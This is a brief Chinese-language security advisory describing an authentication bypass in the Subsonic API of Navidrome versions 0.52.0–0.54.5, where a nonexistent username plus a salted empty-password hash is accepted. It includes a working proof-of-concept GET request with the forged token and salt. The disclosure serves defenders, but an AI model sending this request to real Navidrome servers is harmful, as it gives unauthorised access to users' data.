Navidrome 是一款开源的、基于Web的音乐收藏服务器和流媒体应用。该漏洞存在于0.52.0至0.54.5版本中，特定Subsonic API端点的身份验证检查过程存在缺陷。攻击者可以指定系统中任意不存在的用户名，并配合一个空密码的加盐哈希值，在此条件下，Navidrome会将请求视为已认证，从而无需有效凭据即可访问多个Subsonic端点。利用此漏洞，攻击者能够绕过身份验证系统，未经授权查看Navidrome中的部分只读数据。 GET /rest/getPlaylists?u=FakeUser&t=9db204e7766d3faf02ebe4e6ac508928&s=3AVOljdYtUcXIdteNQqF0sONK6H&v=1.16.1&c=castafiore&f=json HTTP/1.1

Navidrome